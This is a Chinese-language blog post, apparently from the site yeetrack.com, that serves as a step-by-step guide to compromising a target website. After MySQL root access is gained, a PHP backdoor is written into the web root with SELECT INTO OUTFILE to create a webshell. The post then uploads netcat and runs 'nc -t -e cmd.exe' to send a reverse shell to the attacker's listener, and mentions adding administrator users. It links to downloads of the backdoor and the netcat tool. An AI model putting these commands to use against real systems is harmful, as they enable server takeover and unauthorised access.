在获得目标网站的mysql权限之后,可进一步获取网站webshell,此方法前提①mysql权限是root,②获取到了网站的绝对路径。获取数据库权限的方法,可以尝试sql注入(方法参见易踪网文章,https://www.yeetrack.com/?p=20,https://www.yeetrack.com/?p=272)。获取了mysql的root权限后,在数据库中新建一个表,表内有一个字段,字段内填入php后门代码,如create table doortable ( backdoor varchar(1000) ); 然后 insert into doortable (backdoor) values ("hello world");,实际内容改为php后门代码,php文件链接:http://pan.baidu.com/share/link?shareid=69995&uk=537055152 ,插入成功后,执行命令select * from doortable into outfile "c:apachehtdocstem.php", (实际操作中填入目标网站的绝对路径)。然后我们在自己的机器上去访问这个php文件,效果如图:
,我们可以在webshell中执行命令,如执行tasklist,效果如图:
我们还可以上传自定义的文件到目标网站的路径,如上传一个nc程序(易踪网分享: http://pan.baidu.com/share/link?shareid=69999&uk=537055152), 进一步建立一个反弹链接。选择下载文件中nc.exe,点击上传。上传成功后,首先在我们本机上监听一个端口,命令:nc -vv -l -p 8080,然后通过我们的php后门文件在服务器端执行命令:nc -t -e C:windowssystem32cmd.exe 192.168.1.102 8080。稍后,应该就在我们本地监听的cmd中,建立了一个链接,出现目标主机的shell,如图:
,然后就是net user新建管理员用户等等。。。youthflies发表在易踪网上,链接:https://www.yeetrack.com/?p=280
版权声明
本站文章、图片、视频等(除转载外),均采用知识共享署名 4.0 国际许可协议(CC BY-NC-SA 4.0),转载请注明出处、非商业性使用、并且以相同协议共享。
© 空空博客,本文链接:https://www.yeetrack.com/?p=127
近期评论